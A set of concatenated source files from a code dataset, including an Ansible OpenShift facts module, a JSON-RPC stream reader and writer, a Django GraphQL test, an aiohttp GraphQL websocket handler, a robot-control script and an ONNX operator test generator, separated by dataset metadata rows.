self.system_facts = ansible_facts(module, ['hardware', 'network', 'virtual', 'facter']) # noqa: F405
additional_facts = {}
for (k, v) in self.system_facts.items():
additional_facts["ansible_%s" % k.replace('-', '_')] = v
self.system_facts.update(additional_facts)
except UnboundLocalError:
# ansible-2.2,2.3
self.system_facts = get_all_facts(module)['ansible_facts'] # noqa: F405
self.facts = self.generate_facts(local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite)
def generate_facts(self,
local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite):
local_facts = self.init_local_facts(local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite)
roles = local_facts.keys()
if 'common' in local_facts and 'deployment_type' in local_facts['common']:
deployment_type = local_facts['common']['deployment_type']
else:
deployment_type = 'origin'
if 'common' in local_facts and 'deployment_subtype' in local_facts['common']:
deployment_subtype = local_facts['common']['deployment_subtype']
else:
deployment_subtype = 'basic'
defaults = self.get_defaults(roles, deployment_type, deployment_subtype)
provider_facts = self.init_provider_facts()
facts = apply_provider_facts(defaults, provider_facts)
facts = merge_facts(facts,
local_facts,
additive_facts_to_overwrite,
protected_facts_to_overwrite)
facts = migrate_oauth_template_facts(facts)
facts['current_config'] = get_current_config(facts)
facts = set_url_facts_if_unset(facts)
facts = set_project_cfg_facts_if_unset(facts)
facts = set_node_schedulability(facts)
facts = set_selectors(facts)
facts = set_identity_providers_if_unset(facts)
facts = set_deployment_facts_if_unset(facts)
facts = set_sdn_facts_if_unset(facts, self.system_facts)
facts = set_container_facts_if_unset(facts)
facts = build_kubelet_args(facts)
facts = build_controller_args(facts)
facts = build_api_server_args(facts)
facts = set_version_facts_if_unset(facts)
facts = set_dnsmasq_facts_if_unset(facts)
facts = set_aggregate_facts(facts)
facts = set_etcd_facts_if_unset(facts)
facts = set_proxy_facts(facts)
facts = set_builddefaults_facts(facts)
facts = set_buildoverrides_facts(facts)
if not safe_get_bool(facts['common']['is_containerized']):
facts = set_installed_variant_rpm_facts(facts)
facts = set_nodename(facts)
return dict(openshift=facts)
def get_defaults(self, roles, deployment_type, deployment_subtype):
defaults = {}
ip_addr = self.system_facts['ansible_default_ipv4']['address']
exit_code, output, _ = module.run_command(['hostname', '-f']) # noqa: F405
hostname_f = output.strip() if exit_code == 0 else ''
hostname_values = [hostname_f, self.system_facts['ansible_nodename'],
self.system_facts['ansible_fqdn']]
hostname = choose_hostname(hostname_values, ip_addr).lower()
defaults['common'] = dict(ip=ip_addr,
public_ip=ip_addr,
deployment_type=deployment_type,
deployment_subtype=deployment_subtype,
hostname=hostname,
public_hostname=hostname,
portal_net='172.30.0.0/16',
client_binary='oc', admin_binary='oadm',
dns_domain='cluster.local',
debug_level=2,
config_base='/etc/origin')
if 'master' in roles:
defaults['master'] = dict(api_use_ssl=True, api_port='8443',
controllers_port='8444',
console_use_ssl=True,
console_path='/console',
console_port='8443', etcd_use_ssl=True,
etcd_hosts='', etcd_port='4001',
portal_net='172.30.0.0/16',
embedded_etcd=True, embedded_kube=True,
embedded_dns=True,
bind_addr='0.0.0.0',
session_max_seconds=3600,
session_name='ssn',
session_secrets_file='',
access_token_max_seconds=86400,
auth_token_max_seconds=500,
oauth_grant_method='auto',
dynamic_provisioning_enabled=True,
max_requests_inflight=500)
if 'node' in roles:
defaults['node'] = dict(labels={}, annotations={},
iptables_sync_period='30s',
local_quota_per_fsgroup="",
set_node_ip=False)
if 'docker' in roles:
docker = dict(disable_push_dockerhub=False,
options='--log-driver=journald')
# NOTE: This is a workaround for a dnf output racecondition that can occur in
# some situations. See https://bugzilla.redhat.com/show_bug.cgi?id=918184
if self.system_facts['ansible_pkg_mgr'] == 'dnf':
rpm_rebuilddb()
version_info = get_docker_version_info()
if version_info is not None:
docker['api_version'] = version_info['api_version']
docker['version'] = version_info['version']
docker['gte_1_10'] = LooseVersion(version_info['version']) >= LooseVersion('1.10')
hosted_registry_insecure = get_hosted_registry_insecure()
if hosted_registry_insecure is not None:
docker['hosted_registry_insecure'] = hosted_registry_insecure
docker['service_name'] = 'docker'
defaults['docker'] = docker
if 'cloudprovider' in roles:
defaults['cloudprovider'] = dict(kind=None)
if 'hosted' in roles or self.role == 'hosted':
defaults['hosted'] = dict(
etcd=dict(
storage=dict(
kind=None,
volume=dict(
name='etcd',
size='1Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
),
registry=dict(
storage=dict(
kind=None,
volume=dict(
name='registry',
size='5Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'),
glusterfs=dict(
endpoints='glusterfs-registry-endpoints',
path='glusterfs-registry-volume',
readOnly=False,
swap=False,
swapcopy=True),
host=None,
access=dict(
modes=['ReadWriteMany']
),
create_pv=True,
create_pvc=True
)
),
router=dict()
)
defaults['logging'] = dict(
storage=dict(
kind=None,
volume=dict(
name='logging-es',
size='10Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
)
defaults['loggingops'] = dict(
storage=dict(
kind=None,
volume=dict(
name='logging-es-ops',
size='10Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
)
defaults['metrics'] = dict(
deploy=False,
duration=7,
resolution='10s',
storage=dict(
kind=None,
volume=dict(
name='metrics',
size='10Gi'
),
nfs=dict(
directory='/exports',
options='*(rw,root_squash)'
),
host=None,
access=dict(
modes=['ReadWriteOnce']
),
create_pv=True,
create_pvc=False
)
)
return defaults
def guess_host_provider(self):
# TODO: cloud provider facts should probably be submitted upstream
product_name = self.system_facts['ansible_product_name']
product_version = self.system_facts['ansible_product_version']
virt_type = self.system_facts['ansible_virtualization_type']
virt_role = self.system_facts['ansible_virtualization_role']
bios_vendor = self.system_facts['ansible_system_vendor']
provider = None
metadata = None
if bios_vendor == 'Google':
provider = 'gce'
metadata_url = ('http://metadata.google.internal/'
'computeMetadata/v1/?recursive=true')
headers = {'Metadata-Flavor': 'Google'}
metadata = get_provider_metadata(metadata_url, True, headers,
True)
# Filter sshKeys and serviceAccounts from gce metadata
if metadata:
metadata['project']['attributes'].pop('sshKeys', None)
metadata['instance'].pop('serviceAccounts', None)
elif virt_type == 'xen' and virt_role == 'guest' and re.match(r'.*\.amazon$', product_version):
provider = 'aws'
metadata_url = 'http://169.254.169.254/latest/meta-data/'
metadata = get_provider_metadata(metadata_url)
elif re.search(r'OpenStack', product_name):
provider = 'openstack'
metadata_url = ('http://169.254.169.254/openstack/latest/'
'meta_data.json')
metadata = get_provider_metadata(metadata_url, True, None,
True)
if metadata:
ec2_compat_url = 'http://169.254.169.254/latest/meta-data/'
metadata['ec2_compat'] = get_provider_metadata(
ec2_compat_url
)
# disable pylint maybe-no-member because overloaded use of
# the module name causes pylint to not detect that results
# is an array or hash
# pylint: disable=maybe-no-member
# Filter public_keys and random_seed from openstack metadata
metadata.pop('public_keys', None)
metadata.pop('random_seed', None)
if not metadata['ec2_compat']:
metadata = None
return dict(name=provider, metadata=metadata)
def init_provider_facts(self):
provider_info = self.guess_host_provider()
provider_facts = normalize_provider_facts(
provider_info.get('name'),
provider_info.get('metadata')
)
return provider_facts
@staticmethod
def split_openshift_env_fact_keys(openshift_env_fact, openshift_env_structures):
# By default, we'll split an openshift_env fact by underscores.
fact_keys = openshift_env_fact.split('_')
matching_structure = None
if openshift_env_structures is not None:
for structure in openshift_env_structures:
if re.match(structure, openshift_env_fact):
matching_structure = structure
if matching_structure is None:
return fact_keys
final_keys = []
structure_keys = matching_structure.split('.')
for structure_key in structure_keys:
# Matched current key. Add to final keys.
if structure_key == fact_keys[structure_keys.index(structure_key)]:
final_keys.append(structure_key)
# Wildcard means we will be taking everything from here to the end of the fact.
elif structure_key == '*':
final_keys.append('_'.join(fact_keys[structure_keys.index(structure_key):]))
# Shouldn't have gotten here, return the fact keys.
else:
return fact_keys
return final_keys
def init_local_facts(self, facts=None,
additive_facts_to_overwrite=None,
openshift_env=None,
openshift_env_structures=None,
protected_facts_to_overwrite=None):
changed = False
facts_to_set = dict()
if facts is not None:
facts_to_set[self.role] = facts
if openshift_env != {} and openshift_env is not None:
for fact, value in iteritems(openshift_env):
oo_env_facts = dict()
current_level = oo_env_facts
keys = self.split_openshift_env_fact_keys(fact, openshift_env_structures)[1:]
if len(keys) > 0 and keys[0] != self.role:
continue
for key in keys:
if key == keys[-1]:
current_level[key] = value
elif key not in current_level:
current_level[key] = dict()
current_level = current_level[key]
facts_to_set = merge_facts(orig=facts_to_set,
new=oo_env_facts,
additive_facts_to_overwrite=[],
protected_facts_to_overwrite=[])
local_facts = get_local_facts_from_file(self.filename)
migrated_facts = migrate_local_facts(local_facts)
new_local_facts = merge_facts(migrated_facts,
facts_to_set,
additive_facts_to_overwrite,
protected_facts_to_overwrite)
if 'docker' in new_local_facts:
for cat in ['additional', 'blocked', 'insecure']:
key = '{0}_registries'.format(cat)
if key in new_local_facts['docker']:
val = new_local_facts['docker'][key]
if isinstance(val, string_types):
val = [x.strip() for x in val.split(',')]
seen = set()
new_local_facts['docker'][key] = list()
for registry in val:
if registry not in seen and registry != '':
seen.add(registry)
new_local_facts['docker'][key].append(registry)
if 'log_options' in new_local_facts['docker'] and \
isinstance(new_local_facts['docker']['log_options'], string_types):
new_local_facts['docker']['log_options'] = new_local_facts['docker']['log_options'].split(',')
new_local_facts = self.remove_empty_facts(new_local_facts)
if new_local_facts != local_facts:
self.validate_local_facts(new_local_facts)
changed = True
if not module.check_mode:
save_local_facts(self.filename, new_local_facts)
self.changed = changed
return new_local_facts
def remove_empty_facts(self, facts=None):
facts_to_remove = []
for fact, value in iteritems(facts):
if isinstance(facts[fact], dict):
facts[fact] = self.remove_empty_facts(facts[fact])
else:
if value == "" or value == [""] or value is None:
facts_to_remove.append(fact)
for fact in facts_to_remove:
del facts[fact]
return facts
def validate_local_facts(self, facts=None):
invalid_facts = dict()
invalid_facts = self.validate_master_facts(facts, invalid_facts)
if invalid_facts:
msg = 'Invalid facts detected:\n'
for key in invalid_facts.keys():
msg += '{0}: {1}\n'.format(key, invalid_facts[key])
module.fail_json(msg=msg, changed=self.changed)
# with best effort reduction of error messages here.
# disabling errors for too-many-branches since we require checking
# many conditions.
# pylint: disable=line-too-long, too-many-branches
@staticmethod
def validate_master_facts(facts, invalid_facts):
if 'master' in facts:
# openshift.master.session_auth_secrets
if 'session_auth_secrets' in facts['master']:
session_auth_secrets = facts['master']['session_auth_secrets']
if not issubclass(type(session_auth_secrets), list):
invalid_facts['session_auth_secrets'] = 'Expects session_auth_secrets is a list.'
elif 'session_encryption_secrets' not in facts['master']:
invalid_facts['session_auth_secrets'] = ('openshift_master_session_encryption secrets must be set '
'if openshift_master_session_auth_secrets is provided.')
elif len(session_auth_secrets) != len(facts['master']['session_encryption_secrets']):
invalid_facts['session_auth_secrets'] = ('openshift_master_session_auth_secrets and '
'openshift_master_session_encryption_secrets must be '
'equal length.')
else:
for secret in session_auth_secrets:
if len(secret) < 32:
invalid_facts['session_auth_secrets'] = ('Invalid secret in session_auth_secrets. '
'Secrets must be at least 32 characters in length.')
# openshift.master.session_encryption_secrets
if 'session_encryption_secrets' in facts['master']:
session_encryption_secrets = facts['master']['session_encryption_secrets']
if not issubclass(type(session_encryption_secrets), list):
invalid_facts['session_encryption_secrets'] = 'Expects session_encryption_secrets is a list.'
elif 'session_auth_secrets' not in facts['master']:
invalid_facts['session_encryption_secrets'] = ('openshift_master_session_auth_secrets must be '
'set if openshift_master_session_encryption_secrets '
'is provided.')
else:
for secret in session_encryption_secrets:
if len(secret) not in [16, 24, 32]:
invalid_facts['session_encryption_secrets'] = ('Invalid secret in session_encryption_secrets. '
'Secrets must be 16, 24, or 32 characters in length.')
return invalid_facts
def main():
# disabling pylint errors for global-variable-undefined and invalid-name
# for 'global module' usage, since it is required to use ansible_facts
# pylint: disable=global-variable-undefined, invalid-name
global module
module = AnsibleModule( # noqa: F405
argument_spec=dict(
role=dict(default='common', required=False,
choices=OpenShiftFacts.known_roles),
local_facts=dict(default=None, type='dict', required=False),
additive_facts_to_overwrite=dict(default=[], type='list', required=False),
openshift_env=dict(default={}, type='dict', required=False),
openshift_env_structures=dict(default=[], type='list', required=False),
protected_facts_to_overwrite=dict(default=[], type='list', required=False)
),
supports_check_mode=True,
add_file_common_args=True,
)
if not HAVE_DBUS:
module.fail_json(msg="This module requires dbus python bindings") # noqa: F405
module.params['gather_subset'] = ['hardware', 'network', 'virtual', 'facter'] # noqa: F405
module.params['gather_timeout'] = 10 # noqa: F405
module.params['filter'] = '*' # noqa: F405
role = module.params['role'] # noqa: F405
local_facts = module.params['local_facts'] # noqa: F405
additive_facts_to_overwrite = module.params['additive_facts_to_overwrite'] # noqa: F405
openshift_env = module.params['openshift_env'] # noqa: F405
openshift_env_structures = module.params['openshift_env_structures'] # noqa: F405
protected_facts_to_overwrite = module.params['protected_facts_to_overwrite'] # noqa: F405
fact_file = '/etc/ansible/facts.d/openshift.fact'
openshift_facts = OpenShiftFacts(role,
fact_file,
local_facts,
additive_facts_to_overwrite,
openshift_env,
openshift_env_structures,
protected_facts_to_overwrite)
file_params = module.params.copy() # noqa: F405
file_params['path'] = fact_file
file_args = module.load_file_common_arguments(file_params) # noqa: F405
changed = module.set_fs_attributes_if_different(file_args, # noqa: F405
openshift_facts.changed)
return module.exit_json(changed=changed, # noqa: F405
ansible_facts=openshift_facts.facts)
if __name__ == '__main__':
main()
| true | true |
1c2c91ef426018a08e97eb10508fb90a171c6c47 | 5,831 | py | Python | robocorp-python-ls-core/src/robocorp_ls_core/jsonrpc/streams.py | GLMeece/robotframework-lsp | dc9c807c4a192d252df1d05a1c5d16f8c1f24086 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | robocorp-python-ls-core/src/robocorp_ls_core/jsonrpc/streams.py | GLMeece/robotframework-lsp | dc9c807c4a192d252df1d05a1c5d16f8c1f24086 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | robocorp-python-ls-core/src/robocorp_ls_core/jsonrpc/streams.py | GLMeece/robotframework-lsp | dc9c807c4a192d252df1d05a1c5d16f8c1f24086 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Original work Copyright 2018 Palantir Technologies, Inc. (MIT)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
from robocorp_ls_core.robotframework_log import get_logger
from typing import Optional
import json
from robocorp_ls_core.options import BaseOptions
log = get_logger(__name__)
def read(stream) -> Optional[str]:
"""
Reads one message from the stream and returns the message (or None if EOF was reached).
:param stream:
The stream we should be reading from.
:return str|NoneType:
The message or None if the stream was closed.
"""
headers = {}
while True:
# Interpret the http protocol headers
line = stream.readline() # The trailing \r\n should be there.
if not line: # EOF
return None
line = line.strip().decode("ascii")
if not line: # Read just a new line without any contents
break
try:
name, value = line.split(": ", 1)
except ValueError:
raise RuntimeError("Invalid header line: {}.".format(line))
headers[name.strip()] = value.strip()
if not headers:
raise RuntimeError("Got message without headers.")
content_length = int(headers["Content-Length"])
# Get the actual json
body = _read_len(stream, content_length)
return body.decode("utf-8")
def _read_len(stream, content_length) -> bytes:
buf = b""
if not content_length:
return buf
# Grab the body
while True:
data = stream.read(content_length - len(buf))
if not buf and len(data) == content_length:
# Common case
return data
buf += data
if len(buf) == content_length:
return buf
if len(buf) > content_length:
raise AssertionError(
"Expected to read message up to len == %s (already read: %s). Found:\n%s"
% (content_length, len(buf), buf.decode("utf-8", "replace"))
)
# len(buf) < content_length (just keep on going).
class JsonRpcStreamReader(object):
def __init__(self, rfile):
self._rfile = rfile
def close(self):
self._rfile.close()
def listen(self, message_consumer):
"""Blocking call to listen for messages on the rfile.
Args:
message_consumer (fn): function that is passed each message as it is read off the socket.
"""
try:
while not self._rfile.closed:
data = read(self._rfile)
if data is None:
log.debug("Read: %s", data)
return
try:
msg = json.loads(data)
except:
log.exception("Failed to parse JSON message %s", data)
continue
if isinstance(msg, dict):
if msg.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
log.debug("Read: %s", data)
else:
log.debug("Read (non dict data): %s", data)
try:
message_consumer(msg)
except:
log.exception("Error processing JSON message %s", data)
continue
except ConnectionResetError:
pass # Just ignore this one (connection was closed)
except Exception:
log.exception("Error in JsonRpcStreamReader.")
finally:
log.debug("Exited JsonRpcStreamReader.")
class JsonRpcStreamWriter(object):
def __init__(self, wfile, **json_dumps_args):
assert wfile is not None
self._wfile = wfile
self._wfile_lock = threading.Lock()
self._json_dumps_args = json_dumps_args
def close(self):
log.debug("Will close writer")
with self._wfile_lock:
self._wfile.close()
def write(self, message):
with self._wfile_lock:
if self._wfile.closed:
log.debug("Unable to write %s (file already closed).", (message,))
return False
try:
if isinstance(message, dict):
if message.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
log.debug("Writing: %s", message)
else:
log.debug("Writing (non dict message): %s", message)
body = json.dumps(message, **self._json_dumps_args)
as_bytes = body.encode("utf-8")
stream = self._wfile
content_len_as_str = "Content-Length: %s\r\n\r\n" % len(as_bytes)
content_len_bytes = content_len_as_str.encode("ascii")
stream.write(content_len_bytes)
stream.write(as_bytes)
stream.flush()
return True
except Exception: # pylint: disable=broad-except
log.exception(
"Failed to write message to output file %s - closed: %s",
message,
self._wfile.closed,
)
return False
| 34.099415 | 101 | 0.579832 |
import threading
from robocorp_ls_core.robotframework_log import get_logger
from typing import Optional
import json
from robocorp_ls_core.options import BaseOptions
log = get_logger(__name__)
def read(stream) -> Optional[str]:
headers = {}
while True:
line = stream.readline()
if not line:
return None
line = line.strip().decode("ascii")
if not line:
break
try:
name, value = line.split(": ", 1)
except ValueError:
raise RuntimeError("Invalid header line: {}.".format(line))
headers[name.strip()] = value.strip()
if not headers:
raise RuntimeError("Got message without headers.")
content_length = int(headers["Content-Length"])
body = _read_len(stream, content_length)
return body.decode("utf-8")
def _read_len(stream, content_length) -> bytes:
buf = b""
if not content_length:
return buf
while True:
data = stream.read(content_length - len(buf))
if not buf and len(data) == content_length:
return data
buf += data
if len(buf) == content_length:
return buf
if len(buf) > content_length:
raise AssertionError(
"Expected to read message up to len == %s (already read: %s). Found:\n%s"
% (content_length, len(buf), buf.decode("utf-8", "replace"))
)
class JsonRpcStreamReader(object):
def __init__(self, rfile):
self._rfile = rfile
def close(self):
self._rfile.close()
def listen(self, message_consumer):
try:
while not self._rfile.closed:
data = read(self._rfile)
if data is None:
log.debug("Read: %s", data)
return
try:
msg = json.loads(data)
except:
log.exception("Failed to parse JSON message %s", data)
continue
if isinstance(msg, dict):
if msg.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
log.debug("Read: %s", data)
else:
log.debug("Read (non dict data): %s", data)
try:
message_consumer(msg)
except:
log.exception("Error processing JSON message %s", data)
continue
except ConnectionResetError:
pass
except Exception:
log.exception("Error in JsonRpcStreamReader.")
finally:
log.debug("Exited JsonRpcStreamReader.")
class JsonRpcStreamWriter(object):
def __init__(self, wfile, **json_dumps_args):
assert wfile is not None
self._wfile = wfile
self._wfile_lock = threading.Lock()
self._json_dumps_args = json_dumps_args
def close(self):
log.debug("Will close writer")
with self._wfile_lock:
self._wfile.close()
def write(self, message):
with self._wfile_lock:
if self._wfile.closed:
log.debug("Unable to write %s (file already closed).", (message,))
return False
try:
if isinstance(message, dict):
if message.get("command") not in BaseOptions.HIDE_COMMAND_MESSAGES:
log.debug("Writing: %s", message)
else:
log.debug("Writing (non dict message): %s", message)
body = json.dumps(message, **self._json_dumps_args)
as_bytes = body.encode("utf-8")
stream = self._wfile
content_len_as_str = "Content-Length: %s\r\n\r\n" % len(as_bytes)
content_len_bytes = content_len_as_str.encode("ascii")
stream.write(content_len_bytes)
stream.write(as_bytes)
stream.flush()
return True
except Exception:
log.exception(
"Failed to write message to output file %s - closed: %s",
message,
self._wfile.closed,
)
return False
| true | true |
1c2c937a1e1b887eac89fb032b256333827e1c88 | 709 | py | Python | online_shop/app/tests/test_product_schema.py | styam/django_graphene | 7ae997bd7e3d8ceae1820f8c9ef69ba16d0c53ee | [
"MIT"
] | 2 | 2021-03-24T10:55:54.000Z | 2021-04-05T12:36:56.000Z | online_shop/app/tests/test_product_schema.py | styam/django_graphene | 7ae997bd7e3d8ceae1820f8c9ef69ba16d0c53ee | [
"MIT"
] | null | null | null | online_shop/app/tests/test_product_schema.py | styam/django_graphene | 7ae997bd7e3d8ceae1820f8c9ef69ba16d0c53ee | [
"MIT"
] | null | null | null | from django.test import TestCase
import pytest
from graphene.test import Client
from mixer.backend.django import mixer
from app.models import Product
from app.tests.schema_format import (product_query_list, )
from online_shop.schema import schema
@pytest.mark.django_db
class TestProduct(TestCase):
def setUp(self):
self.client = Client(schema)
self.product = mixer.blend(Product)
# ======================= Test all categories=======================
def test_product_list(self):
breakpoint()
mixer.blend(Product)
response = self.client.execute(product_query_list)
products = response.get("data").get("allProducts")
assert len(products)
| 28.36 | 72 | 0.675599 | from django.test import TestCase
import pytest
from graphene.test import Client
from mixer.backend.django import mixer
from app.models import Product
from app.tests.schema_format import (product_query_list, )
from online_shop.schema import schema
@pytest.mark.django_db
class TestProduct(TestCase):
def setUp(self):
self.client = Client(schema)
self.product = mixer.blend(Product)
def test_product_list(self):
breakpoint()
mixer.blend(Product)
response = self.client.execute(product_query_list)
products = response.get("data").get("allProducts")
assert len(products)
| true | true |
1c2c9484e694e8a751c4dd47aed3cf1de2b9f7ef | 1,065 | py | Python | 2020-09-01-1054-gma_my_scara_funcs.py | gmaubach/OOP-with-Python | 9b059e911d55d616e756324564f1f2cc524aa53d | [
"MIT"
] | null | null | null | 2020-09-01-1054-gma_my_scara_funcs.py | gmaubach/OOP-with-Python | 9b059e911d55d616e756324564f1f2cc524aa53d | [
"MIT"
] | null | null | null | 2020-09-01-1054-gma_my_scara_funcs.py | gmaubach/OOP-with-Python | 9b059e911d55d616e756324564f1f2cc524aa53d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 31 11:14:43 2020
@author: Georg Maubach
"""
# Ab Python 3.8 müssen dlls als vertrauenswürdig markiert werden.
# Deshalb ab 3.8.x von den unteren beiden Anweisungen den
# Kommentar entfernen und den Pfad zum Projektverzeichnis
# korrekt angeben
import os
os.add_dll_directory("D:\Selfcoding\WillmsBis040920\scara64anaconda")
# Folgende Zeile fuer VisualStudio Code
os.environ['QT_PLUGIN_PATH'] = "D:\Selfcoding\WillmsBis040920\scara64anaconda"
import ctypes
Scara = ctypes.cdll.scara
def gehe2():
Scara.gehe();
Scara.gehe();
def gehe3():
# Scara.gehe();
# Scara.gehe();
# Scara.gehe();
# besser Code-Verdopplung vermeiden und
# das, was ich schon habe, verwednen.
gehe2();
Scara.gehe();
def dreheRechts():
for i in range(3):
Scara.dreheLinks();
def dreheUm():
Scara.dreheLinks();
Scara.dreheLinks();
def geheBisAbgrund():
while(Scara.istVorneAbgrund() == False):
Scara.gehe();
# EOF .
| 22.659574 | 79 | 0.646009 |
import os
os.add_dll_directory("D:\Selfcoding\WillmsBis040920\scara64anaconda")
os.environ['QT_PLUGIN_PATH'] = "D:\Selfcoding\WillmsBis040920\scara64anaconda"
import ctypes
Scara = ctypes.cdll.scara
def gehe2():
Scara.gehe();
Scara.gehe();
def gehe3():
gehe2();
Scara.gehe();
def dreheRechts():
for i in range(3):
Scara.dreheLinks();
def dreheUm():
Scara.dreheLinks();
Scara.dreheLinks();
def geheBisAbgrund():
while(Scara.istVorneAbgrund() == False):
Scara.gehe();
| true | true |
1c2c95e73bc880ae001b0144521b1da015427cdf | 1,950 | py | Python | strawberry/aiohttp/handlers/graphql_transport_ws_handler.py | TheVinhLuong102/Strawberry | 3c442dc19d17bc55c4e26de1db7a9eedc0a228f5 | [
"MIT"
] | 2,062 | 2019-04-07T17:47:30.000Z | 2022-03-31T01:54:16.000Z | strawberry/aiohttp/handlers/graphql_transport_ws_handler.py | TheVinhLuong102/Strawberry | 3c442dc19d17bc55c4e26de1db7a9eedc0a228f5 | [
"MIT"
] | 1,582 | 2019-04-07T18:31:33.000Z | 2022-03-31T18:32:13.000Z | strawberry/aiohttp/handlers/graphql_transport_ws_handler.py | TheVinhLuong102/Strawberry | 3c442dc19d17bc55c4e26de1db7a9eedc0a228f5 | [
"MIT"
] | 303 | 2019-04-13T08:44:40.000Z | 2022-03-29T09:54:41.000Z | from datetime import timedelta
from typing import Any
from aiohttp import http, web
from strawberry.schema import BaseSchema
from strawberry.subscriptions import GRAPHQL_TRANSPORT_WS_PROTOCOL
from strawberry.subscriptions.protocols.graphql_transport_ws.handlers import (
BaseGraphQLTransportWSHandler,
)
class GraphQLTransportWSHandler(BaseGraphQLTransportWSHandler):
def __init__(
self,
schema: BaseSchema,
debug: bool,
connection_init_wait_timeout: timedelta,
get_context,
get_root_value,
request: web.Request,
):
super().__init__(schema, debug, connection_init_wait_timeout)
self._get_context = get_context
self._get_root_value = get_root_value
self._request = request
self._ws = web.WebSocketResponse(protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL])
async def get_context(self) -> Any:
return await self._get_context(request=self._request, response=self._ws)
async def get_root_value(self) -> Any:
return await self._get_root_value(request=self._request)
async def send_json(self, data: dict) -> None:
await self._ws.send_json(data)
async def close(self, code: int, reason: str) -> None:
await self._ws.close(code=code, message=reason.encode())
async def handle_request(self) -> web.StreamResponse:
await self._ws.prepare(self._request)
try:
async for ws_message in self._ws: # type: http.WSMessage
if ws_message.type == http.WSMsgType.TEXT:
await self.handle_message(ws_message.json())
else:
error_message = "WebSocket message type must be text"
await self.handle_invalid_message(error_message)
finally:
for operation_id in list(self.subscriptions.keys()):
await self.cleanup_operation(operation_id)
return self._ws
| 35.454545 | 83 | 0.680513 | from datetime import timedelta
from typing import Any
from aiohttp import http, web
from strawberry.schema import BaseSchema
from strawberry.subscriptions import GRAPHQL_TRANSPORT_WS_PROTOCOL
from strawberry.subscriptions.protocols.graphql_transport_ws.handlers import (
BaseGraphQLTransportWSHandler,
)
class GraphQLTransportWSHandler(BaseGraphQLTransportWSHandler):
def __init__(
self,
schema: BaseSchema,
debug: bool,
connection_init_wait_timeout: timedelta,
get_context,
get_root_value,
request: web.Request,
):
super().__init__(schema, debug, connection_init_wait_timeout)
self._get_context = get_context
self._get_root_value = get_root_value
self._request = request
self._ws = web.WebSocketResponse(protocols=[GRAPHQL_TRANSPORT_WS_PROTOCOL])
async def get_context(self) -> Any:
return await self._get_context(request=self._request, response=self._ws)
async def get_root_value(self) -> Any:
return await self._get_root_value(request=self._request)
async def send_json(self, data: dict) -> None:
await self._ws.send_json(data)
async def close(self, code: int, reason: str) -> None:
await self._ws.close(code=code, message=reason.encode())
async def handle_request(self) -> web.StreamResponse:
await self._ws.prepare(self._request)
try:
async for ws_message in self._ws:
if ws_message.type == http.WSMsgType.TEXT:
await self.handle_message(ws_message.json())
else:
error_message = "WebSocket message type must be text"
await self.handle_invalid_message(error_message)
finally:
for operation_id in list(self.subscriptions.keys()):
await self.cleanup_operation(operation_id)
return self._ws
| true | true |
1c2c9673239875aebecc14562678e37ce6ad98b8 | 1,827 | py | Python | test/parser/unit_operators/testcases/Reciprocal/Reciprocal_generator.py | AyishaR/deepC | 1dc9707ef5ca9000fc13c3da7f1129685a83b494 | [
"Apache-2.0"
] | 223 | 2020-04-15T20:34:33.000Z | 2022-03-28T05:41:49.000Z | test/parser/unit_operators/testcases/Reciprocal/Reciprocal_generator.py | AyishaR/deepC | 1dc9707ef5ca9000fc13c3da7f1129685a83b494 | [
"Apache-2.0"
] | 42 | 2019-07-29T15:57:12.000Z | 2020-04-08T15:12:48.000Z | test/parser/unit_operators/testcases/Reciprocal/Reciprocal_generator.py | AyishaR/deepC | 1dc9707ef5ca9000fc13c3da7f1129685a83b494 | [
"Apache-2.0"
] | 58 | 2019-07-22T11:46:19.000Z | 2020-04-09T22:56:41.000Z |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
#
# This file is part of DNN compiler maintained at
# https://github.com/ai-techsystems/dnnCompiler
import os, sys
import numpy as np
separator = os.path.sep
from onnx import *
sys.path.append(".."+separator+".."+separator+".."+separator+".."+separator+"python/parser")
from onnx_parser import *
op_name = 'Reciprocal'
inputs = [helper.make_tensor_value_info("X",TensorProto.FLOAT,(1,2))]
outputs = [helper.make_tensor_value_info("Y",TensorProto.FLOAT,(2,3))]
nodes = []
nodes.append(helper.make_node("Reciprocal",["X"],["Y"],))
graph = helper.make_graph(nodes, op_name+"_graph", inputs, outputs)
opset = (OperatorSetIdProto(version=11),)
